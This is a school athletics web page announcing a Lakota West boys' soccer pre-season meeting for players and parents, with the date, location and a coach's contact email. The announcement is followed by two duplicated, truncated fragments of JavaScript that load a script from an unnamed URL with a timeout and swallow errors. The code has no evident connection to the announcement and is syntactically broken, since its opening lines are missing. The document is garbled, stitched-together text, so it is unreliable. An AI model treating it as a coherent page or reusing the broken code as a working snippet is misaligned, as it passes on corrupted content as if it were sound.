Boys Soccer
Mark Your Calendars: Lakota West Men’s Soccer Pre-Season Information Meeting!
There will be a Lakota West Men’s Soccer Player & Parent information meeting for students currently in grades 8 through 11 who will attend Lakota West next fall and are interested in playing soccer. The meeting will be Wednesday, February 23rd at 6:30 PM in the Diner at Lakota West High School. All players interested in playing soccer in the fall should attend this meeting and have a parent attend with them. If you or one of your parents cannot attend the meeting you will need to email coach Cooper at rick.cooper@lakotaonline.com
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();